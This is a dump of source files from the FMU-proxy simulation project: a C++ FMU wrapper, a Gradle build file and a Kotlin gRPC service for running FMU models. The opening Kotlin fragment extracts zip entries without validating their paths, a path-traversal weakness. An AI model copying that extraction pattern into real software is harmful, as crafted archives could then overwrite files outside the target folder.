ZipInputStream(content).use { zis ->\n var nextEntry: ZipEntry? = zis.nextEntry\n while (nextEntry != null) {\n if (!nextEntry.isDirectory) {\n File(baseFile, nextEntry.name).also { file ->\n if (!file.exists()) {\n if (!file.parentFile.exists()) {\n file.parentFile.mkdirs()\n }\n FileOutputStream(file).use { fis ->\n zis.copyTo(fis)\n }\n }\n }\n }\n nextEntry = zis.nextEntry\n }\n }\n\n}\n\n\n\n" }, { "alpha_fraction": 0.6871174573898315, "alphanum_fraction": 0.6973185539245605, "avg_line_length": 32.778324127197266, "blob_id": "26cba9fc03a09793964c6b3bd92f8c992059c6a8", "content_id": "65c7eddb9aa65f4ad13d260455ad7912067e0299", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6862, "license_type": "permissive", "max_line_length": 137, "num_lines": 203, "path": "/cpp/FMU-proxy/common/FmuWrapper.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n\n#include \"ThriftHelper.h\"\n#include \"FmuHelper.h\"\n#include \"FmuWrapper.h\"\n\n#define RELTOL 1E-4\n\nusing namespace ::fmuproxy;\nusing namespace ::fmuproxy::thrift;\nusing namespace ::fmuproxy::thrift_helper;\nusing namespace boost::filesystem;\n\n\nFmuWrapper::FmuWrapper (const char* fmu_path) {\n\n this->tmp_path = temp_directory_path() /= path(fmu_path).stem();\n create_directories(tmp_path);\n\n this->callbacks = create_callbacks(jm_log_level_nothing);\n\n this->ctx = fmi_import_allocate_context(&callbacks);\n this->version = fmi_import_get_fmi_version(ctx, fmu_path, tmp_path.c_str());\n\n this->xml = load_model_description(tmp_path.c_str(), ctx, callbacks);\n\n this->modelDescription = shared_ptr<ModelDescription>(new ModelDescription());\n get_model_description(version, xml, *modelDescription);\n\n}\n\nshared_ptr<ModelDescription> FmuWrapper::getModelDescription() {\n return modelDescription;\n}\n\nshared_ptr<FmuInstance> FmuWrapper::newInstance() {\n\n fmi2_callback_functions_t callBackFunctions;\n callBackFunctions.logger = fmi2_log_forwarding;\n callBackFunctions.allocateMemory = std::calloc;\n callBackFunctions.freeMemory = std::free;\n callBackFunctions.componentEnvironment = nullptr;\n\n const char* model_identifier = fmi2_import_get_model_identifier_CS(xml);\n fmi2_import_t* fmu = load_model_description(tmp_path.c_str(), ctx, callbacks);\n\n jm_status_enu_t status = fmi2_import_create_dllfmu(fmu, fmi2_fmu_kind_cs, &callBackFunctions);\n if (status == jm_status_error) {\n string error_msg = \"Could not create the DLL loading mechanism(C-API) (error: \" + string(fmi2_import_get_last_error(fmu)) + \")\";\n __throw_runtime_error(error_msg.c_str());\n }\n\n jm_status_enu_t jmstatus = fmi2_import_instantiate(\n fmu, model_identifier, fmi2_cosimulation, nullptr, false);\n if (jmstatus == jm_status_error) {\n __throw_runtime_error(\"fmi2_import_instantiate failed!\");\n }\n\n return shared_ptr<FmuInstance>(new FmuInstance(fmu));\n\n}\n\nFmuWrapper::~FmuWrapper() {\n\n cout << \"FmuWrapper destructor called\" << endl;\n\n fmi_import_free_context(this->ctx);\n remove_all(this->tmp_path);\n\n}\n\nFmuInstance::FmuInstance(fmi2_import_t *fmu) {\n this->instance = fmu;\n}\n\nvoid FmuInstance::init(double start, double stop) {\n\n fmi2_boolean_t stop_time_defined = start < stop;\n fmi2_status_t status = fmi2_import_setup_experiment(instance, fmi2_true,\n RELTOL, start, stop_time_defined, stop);\n if(status != fmi2_status_ok) {\n __throw_runtime_error(\"fmi2_import_setup_experiment failed\");\n }\n\n status = fmi2_import_enter_initialization_mode(instance);\n if(status != fmi2_status_ok) {\n __throw_runtime_error(\"fmi2_import_enter_initialization_mode failed\");\n }\n\n status = fmi2_import_exit_initialization_mode(instance);\n if(status != fmi2_status_ok) {\n __throw_runtime_error(\"fmi2_import_exit_initialization_mode failed\");\n }\n\n}\n\nvoid FmuInstance::step(double step_size, StepResult& result) {\n fmi2_status_t status = fmi2_import_do_step(\n instance, current_time, step_size, fmi2_true);\n current_time += step_size;\n\n result.status = thriftType(status);\n result.simulationTime = current_time;\n}\n\nStatus::type FmuInstance::reset() {\n fmi2_status_t status = 
fmi2_import_reset(instance);\n    return thriftType(status);\n}\n\nStatus::type FmuInstance::terminate() {\n    if (terminated) {\n        return thriftType(fmi2_status_ok);\n    }\n    terminated = true;\n    fmi2_status_t status = fmi2_import_terminate(instance);\n    return thriftType(status);\n}\n\nvoid FmuInstance::getInteger(unsigned int vr, IntegerRead& read) {\n    int value;\n    fmi2_status_t status = fmi2_import_get_integer(instance, &vr, 1, &value);\n    read.value = value;\n    read.status = thriftType(status);\n}\n\nvoid FmuInstance::getInteger(const char* name, IntegerRead& read) {\n    fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n    fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n    getInteger(vr, read);\n}\n\nvoid FmuInstance::getReal(unsigned int vr, RealRead& read) {\n    double value;\n    fmi2_status_t status = fmi2_import_get_real(instance, &vr, 1, &value);\n    read.value = value;\n    read.status = thriftType(status);\n}\n\nvoid FmuInstance::getReal(const char* name, RealRead& read) {\n    fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n    fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n    getReal(vr, read);\n}\n\nvoid FmuInstance::getString(unsigned int vr, StringRead& read) {\n    const char* value;\n    fmi2_status_t status = fmi2_import_get_string(instance, &vr, 1, &value);\n    read.value = value;\n    read.status = thriftType(status);\n}\n\nvoid FmuInstance::getString(const char* name, StringRead& read) {\n    fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n    fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n    getString(vr, read);\n}\n\nvoid FmuInstance::getBoolean(unsigned int vr, BooleanRead& read) {\n    int value;\n    fmi2_status_t status = fmi2_import_get_boolean(instance, &vr, 1, &value);\n    read.value = value;\n    read.status = thriftType(status);\n}\n\nvoid FmuInstance::getBoolean(const char* name, BooleanRead& read) {\n    fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n    fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n    getBoolean(vr, read);\n}\n\nFmuInstance::~FmuInstance() {\n\n    cout << \"FmuInstance destructor called\" << endl;\n\n    terminate();\n    fmi2_import_destroy_dllfmu(instance);\n    fmi2_import_free(instance);\n\n}\n\n\n\n\n\n" }, { "alpha_fraction": 0.6737967729568481, "alphanum_fraction": 0.678141713142395, "avg_line_length": 25.945945739746094, "blob_id": "383c381314a70962ea1817948e1c3318e183cea0", "content_id": "559f5706aba204b78c7fd04280e2c8c0d9d8352c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2992, "license_type": "permissive", "max_line_length": 81, "num_lines": 111, "path": "/cpp/FMU-proxy/common/FmuWrapper.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", 
WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_FMUWRAPPER_H\n#define FMU_PROXY_FMUWRAPPER_H\n\n#include <fmilib.h>\n#include <boost/filesystem.hpp>\n#include \"thrift-gen/definitions_types.h\"\n\nusing namespace std;\nusing namespace boost::filesystem;\nusing namespace ::fmuproxy::thrift;\n\nnamespace fmuproxy {\n\n class FmuInstance {\n\n private:\n\n fmi2_import_t *instance;\n\n double current_time = 0.0;\n bool terminated = false;\n\n public:\n FmuInstance(fmi2_import_t* fmu);\n\n void init(double start, double end);\n\n void step(double step_size, StepResult& result);\n\n Status::type reset();\n\n Status::type terminate();\n\n double getCurrentTime() {\n return current_time;\n }\n\n bool isTerminated() {\n return terminated;\n }\n\n void getInteger(unsigned int vr, IntegerRead& read);\n void getInteger(const char *name, IntegerRead& read);\n\n void getReal(unsigned int vr, RealRead& read);\n void getReal(const char *name, RealRead& read);\n\n\n void getString(unsigned int vr, StringRead& read);\n void getString(const char *name, StringRead& read);\n\n void getBoolean(unsigned int vr, BooleanRead& read);\n void getBoolean(const char *name, BooleanRead& read);\n\n ~FmuInstance();\n\n };\n\n class FmuWrapper {\n\n private:\n\n path tmp_path;\n fmi2_import_t* xml;\n fmi_xml_context_t* ctx;\n jm_callbacks callbacks;\n fmi_version_enu_t version;\n\n shared_ptr<ModelDescription> modelDescription;\n\n public:\n FmuWrapper(const char *fmu_path);\n\n const char* getModelDescriptionXml();\n\n shared_ptr<ModelDescription> getModelDescription();\n\n shared_ptr<FmuInstance> newInstance();\n\n ~FmuWrapper();\n\n };\n\n}\n\n\n#endif //FMU_PROXY_FMUWRAPPER_H\n\n" }, { "alpha_fraction": 0.6442831158638, "alphanum_fraction": 0.6814882159233093, "avg_line_length": 34.51612854003906, "blob_id": "a2375ccdbebc5d6515e853fb229dcde60c5b4fad", "content_id": "4b70f3993d102bbbdc2d9161164f54d29c9b761f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1102, "license_type": "permissive", "max_line_length": 120, "num_lines": 31, "path": "/java/FMU-proxy/fmu-proxy-gen/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\napply plugin: 'kotlin'\napply plugin: 'application'\n\nmainClassName = 'no.mechatronics.sfi.fmuproxy.ApplicationStarter'\n\ndistributions {\n main {\n baseName = 'fmu-proxy-gen'\n applicationName = \"fmu-proxy-gen\"\n }\n}\n\ndef snapshot = true\ndef fmi4j_version = snapshot ? 
fmi4j_snapshot_version : fmi4j_stable_version\n\ndependencies {\n\n compile group: 'info.picocli', name: 'picocli', version: '2.3.0'\n compile group: 'org.jtwig', name: 'jtwig-core', version: '5.87.0.RELEASE'\n compile group: 'no.mechatronics.sfi.fmi4j', name: 'fmi-modeldescription', version: fmi4j_version, changing: snapshot\n\n testCompile group: 'io.grpc', name: 'grpc-stub', version: '1.11.0'\n testCompile group: 'io.grpc', name: 'grpc-netty', version: '1.11.0'\n testCompile group: 'io.grpc', name: 'grpc-protobuf', version: '1.11.0'\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtime group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n testCompile group: 'no.mechatronics.sfi.fmuproxy', name: 'fmu-proxy', version: '0.1-SNAPSHOT', changing: true\n\n}\n" }, { "alpha_fraction": 0.654013454914093, "alphanum_fraction": 0.6556515693664551, "avg_line_length": 37.903297424316406, "blob_id": "9a17427e5b8cbb1301c760cf54f94ba55b492c7f", "content_id": "ff98f08d9000d1f6c22cd0578fac1eb058200740", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 17703, "license_type": "permissive", "max_line_length": 204, "num_lines": 455, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/grpc/services/GrpcFmuServiceImpl.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc.services\n\nimport com.google.protobuf.Empty\nimport io.grpc.BindableService\nimport io.grpc.Status\nimport io.grpc.stub.StreamObserver\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CoSimulationModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelExchangeModelDescription\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.grpc.FmuServiceGrpc\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.Proto\nimport no.mechatronics.sfi.fmuproxy.solver.parseIntegrator\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.apache.commons.math3.ode.nonstiff.*\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\ninterface GrpcFmuService : BindableService {\n\n fun statusReply(status: FmiStatus, responseObserver: StreamObserver<Proto.StatusResponse>) {\n Proto.StatusResponse.newBuilder()\n .setStatus(status.protoType())\n .build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n }\n \n fun noSuchFmuReply(id: Int, responseObserver: StreamObserver<*>) {\n val message = \"No FMU with id=$id!\"\n responseObserver.onError(\n Status.INVALID_ARGUMENT\n .augmentDescription(\"FmuNotFoundException\")\n .withDescription(message)\n .asRuntimeException()\n )\n }\n\n}\n\n\nclass GrpcFmuServiceImpl(\n private val fmu: Fmu\n): FmuServiceGrpc.FmuServiceImplBase(), GrpcFmuService {\n\n private val modelDescription: CommonModelDescription\n = fmu.modelDescription\n\n override fun getModelDescription(request: Empty, responseObserver: StreamObserver<Proto.ModelDescription>) {\n responseObserver.onNext(modelDescription.protoType())\n responseObserver.onCompleted()\n }\n\n override fun getModelDescriptionXml(request: Empty, responseObserver: StreamObserver<Proto.Str>) {\n\n Proto.Str.newBuilder().setValue(fmu.modelDescriptionXml).build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n\n }\n\n override fun canGetAndSetFMUstate(req: Proto.UInt, responseObserver: StreamObserver<Proto.Bool>) {\n val fmuId = req.value\n Fmus.get(fmuId)?.apply {\n val md = modelDescription\n val canGetAndSetFMUstate = when (md) {\n is CoSimulationModelDescription -> md.canGetAndSetFMUstate\n is ModelExchangeModelDescription -> md.canGetAndSetFMUstate\n else -> throw AssertionError(\"ModelDescription is not of type CS or ME?\")\n }\n responseObserver.onNext(canGetAndSetFMUstate.protoType())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun getCurrentTime(req: Proto.UInt, responseObserver: StreamObserver<Proto.Real>) {\n\n val fmuId = req.value\n Fmus.get(fmuId)?.apply {\n responseObserver.onNext(currentTime.protoType())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun isTerminated(req: Proto.UInt, responseObserver: StreamObserver<Proto.Bool>) {\n\n val fmuId = req.value\n Fmus.get(req.value)?.apply {\n responseObserver.onNext(isTerminated.protoType())\n responseObserver.onCompleted()\n 
}?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readInteger(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.IntRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val valueReference = req.valueReference\n val read = variableAccessor.readInteger(valueReference)\n responseObserver.onNext(Proto.IntRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadInteger(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.IntListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.IntListRead.newBuilder()\n val read = variableAccessor.readInteger(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n }?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readReal(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.RealRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val valueReference = req.valueReference\n val read = variableAccessor.readReal(valueReference)\n responseObserver.onNext(Proto.RealRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n }?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadReal(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.RealListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.RealListRead.newBuilder()\n val read = variableAccessor.readReal(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readString(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.StrRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val read = variableAccessor.readString(req.valueReference)\n responseObserver.onNext(Proto.StrRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadString(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.StrListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.StrListRead.newBuilder()\n val read = variableAccessor.readString(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readBoolean(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.BoolRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val read = variableAccessor.readBoolean(req.valueReference)\n responseObserver.onNext(Proto.BoolRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadBoolean(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.BoolListRead>) {\n\n val 
fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.BoolListRead.newBuilder()\n val read = variableAccessor.readBoolean(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n \n\n }\n\n override fun writeInteger(req: Proto.WriteIntRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeInteger(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkWriteInteger(req: Proto.BulkWriteIntRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeInteger(req.valueReferencesList.toIntArray(), req.valuesList.toIntArray())\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun writeReal(req: Proto.WriteRealRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeReal(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n\n }\n\n override fun bulkWriteReal(req: Proto.BulkWriteRealRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeReal(req.valueReferencesList.toIntArray(), req.valuesList.toDoubleArray())\n statusReply(status, responseObserver)\n } ?: statusReply(FmiStatus.Error, responseObserver)\n\n }\n\n override fun writeString(req: Proto.WriteStrRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeString(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n\n }\n\n override fun bulkWriteString(req: Proto.BulkWriteStrRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(req.fmuId)?.apply {\n val status = variableAccessor.writeString(req.valueReferencesList.toIntArray(), req.valuesList.toTypedArray())\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun writeBoolean(req: Proto.WriteBoolRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeBoolean(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n\n }\n\n override fun bulkWriteBoolean(req: Proto.BulkWriteBoolRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeBoolean(req.valueReferencesList.toIntArray(), req.valuesList.toBooleanArray())\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun init(req: Proto.InitRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val start = req.start\n val stop = req.stop\n val hasStart = start > 0\n val hasStop = stop 
> 0 && stop > start\n            if (hasStart && hasStop) {\n                init(start, stop)\n            } else if (hasStart) {\n                init(start)\n            } else {\n                init()\n            }\n            statusReply(lastStatus, responseObserver)\n        } ?: noSuchFmuReply(fmuId, responseObserver)\n\n    }\n\n    override fun step(req: Proto.StepRequest, responseObserver: StreamObserver<Proto.StepResult>) {\n        \n        val fmuId = req.fmuId\n        Fmus.get(fmuId)?.apply {\n            doStep(req.stepSize)\n            Proto.StepResult.newBuilder()\n                    .setSimulationTime(currentTime)\n                    .setStatus(lastStatus.protoType())\n                    .build().also {\n                        responseObserver.onNext(it)\n                        responseObserver.onCompleted()\n                    }\n\n        } ?: noSuchFmuReply(fmuId, responseObserver)\n\n    }\n\n    override fun terminate(req: Proto.UInt, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n        val fmuId = req.value\n        Fmus.remove(fmuId)?.apply {\n            terminate()\n            lastStatus.also { status ->\n                LOG.debug(\"Terminated fmu with status: $status\")\n                statusReply(status, responseObserver)\n            }\n        } ?: noSuchFmuReply(fmuId, responseObserver)\n\n    }\n\n    override fun reset(req: Proto.UInt, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n        val fmuId = req.value\n        Fmus.get(fmuId)?.apply {\n            reset().also {\n                statusReply(lastStatus, responseObserver)\n            }\n        } ?: noSuchFmuReply(fmuId, responseObserver)\n\n    }\n\n\n    override fun createInstanceFromCS(req: Empty, responseObserver: StreamObserver<Proto.UInt>) {\n\n        Fmus.put(fmu.asCoSimulationFmu().newInstance()).also { id ->\n            Proto.UInt.newBuilder().setValue(id).build().also {\n                responseObserver.onNext(it)\n                responseObserver.onCompleted()\n            }\n        }\n\n    }\n\n    override fun createInstanceFromME(req: Proto.Solver, responseObserver: StreamObserver<Proto.UInt>) {\n\n        fun selectDefaultIntegrator(): FirstOrderIntegrator {\n            val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n            LOG.warn(\"No valid integrator found.. Defaulting to Euler with $stepSize stepSize\")\n            return EulerIntegrator(stepSize)\n        }\n\n        val integrator = parseIntegrator(req.name, req.settings) ?: selectDefaultIntegrator()\n        Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator)).also { id ->\n            Proto.UInt.newBuilder().setValue(id).build().also {\n                responseObserver.onNext(it)\n                responseObserver.onCompleted()\n            }\n        }\n\n    }\n\n//    override fun createInstanceFromME(req: Proto.Integrator, responseObserver: StreamObserver<Proto.UInt>) {\n//\n//        fun selectDefaultIntegrator(): FirstOrderIntegrator {\n//            val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n//            LOG.warn(\"No integrator specified.. 
Defaulting to Euler with $stepSize stepSize\")\n// return EulerIntegrator(stepSize)\n// }\n//\n// val integrator = when (req.integratorsCase) {\n// Proto.Integrator.IntegratorsCase.GILL -> GillIntegrator(req.gill.stepSize)\n// Proto.Integrator.IntegratorsCase.EULER -> EulerIntegrator(req.euler.stepSize)\n// Proto.Integrator.IntegratorsCase.MID_POINT -> MidpointIntegrator(req.midPoint.stepSize)\n// Proto.Integrator.IntegratorsCase.RUNGE_KUTTA -> ClassicalRungeKuttaIntegrator(req.rungeKutta.stepSize)\n// Proto.Integrator.IntegratorsCase.ADAMS_BASHFORTH -> req.adamsBashforth.let { AdamsBashforthIntegrator(it.nSteps, it.minStep, it.maxStep, it.scalAbsoluteTolerance, it.scalRelativeTolerance) }\n// Proto.Integrator.IntegratorsCase.DORMAND_PRINCE54 -> req.dormandPrince54.let { DormandPrince54Integrator(it.minStep, it.maxStep, it.scalAbsoluteTolerance, it.scalRelativeTolerance) }\n// else -> selectDefaultIntegrator()\n// }\n//\n// Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator)).also { id ->\n// Proto.UInt.newBuilder().setValue(id).build().also {\n// responseObserver.onNext(it)\n// responseObserver.onCompleted()\n// }\n// }\n//\n// }\n\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(GrpcFmuServer::class.java)\n }\n\n}\n\n\n" } ]
59
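The GrpcFmuServiceImpl in the FMU-proxy record above drives the whole remote FMU life cycle: create an instance, init, step, read variables, terminate. A minimal Python client sketch of that flow, assuming stubs have been generated from the project's proto definitions; the generated module names, the message field names, the value reference, and the server address below are illustrative assumptions, not taken from the repository:

```python
# Hypothetical gRPC client; module names, field names and the port are assumed.
import grpc
from google.protobuf import empty_pb2

import fmu_service_pb2 as proto            # assumed name of the generated message module
import fmu_service_pb2_grpc as proto_grpc  # assumed name of the generated stub module

channel = grpc.insecure_channel("localhost:8000")  # assumed server address
stub = proto_grpc.FmuServiceStub(channel)

# Instantiate a co-simulation FMU; the service answers with the instance id.
fmu_id = stub.CreateInstanceFromCS(empty_pb2.Empty()).value

# init() falls back to the FMU defaults when start/stop are not positive.
stub.Init(proto.InitRequest(fmuId=fmu_id, start=0.0, stop=10.0))

# Advance the simulation and read back a real variable by value reference (46 is a placeholder).
step = stub.Step(proto.StepRequest(fmuId=fmu_id, stepSize=0.01))
read = stub.ReadReal(proto.ReadRequest(fmuId=fmu_id, valueReference=46))
print(step.simulationTime, read.value, read.status)

stub.Terminate(proto.UInt(value=fmu_id))
```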
williehammonds/TwitterDataAnalysis
https://github.com/williehammonds/TwitterDataAnalysis
